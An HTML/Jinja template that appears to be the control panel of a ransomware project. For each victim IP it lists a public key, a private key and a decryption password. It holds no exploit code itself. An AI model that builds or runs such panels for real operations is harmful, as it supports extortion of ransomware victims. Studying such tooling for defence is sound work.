<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">



{%for i in ransom_keys.keys()%}

  <div id="accordion">
      <div class="card">
        <div class="card-header" id="headingOne">
          <h5 class="mb-0">
            <button class="btn btn-link" data-toggle="collapse" data-target="#collapse{{i.replace('.','')}}" aria-expanded="true" aria-controls="collapse{{i.replace('.','')}}">
              Source IP : {{i}}
            </button>
          </h5>
        </div>

        <div id="collapse{{i.replace('.','')}}" class="collapse" aria-labelledby="heading{{i.replace('.','')}}" data-parent="#accordion">
          <div class="card-body">



            <p>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}1" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}1">
                Public Key
              </a>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}2" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}2">
                Private Key
              </a>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}3" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}3">
                Password
              </a>
            </p>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}1">

              {% autoescape false %}
              <div class="card card-body">
                {{ransom_keys[i][0][2:-1]}}
              </div>
              {%endautoescape%}
            </div>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}2">
              <div class="card card-body">
                {% autoescape false %}
                {{ransom_keys[i][1][2:-1]}}
                {%endautoescape%}
              </div>
            </div>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}3">
              <div class="card card-body">
                {{decryption_keys[i]}}
              </div>
            </div>






          </div>
        </div>
      </div>
    </div>

{%endfor%}

<br/>

<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
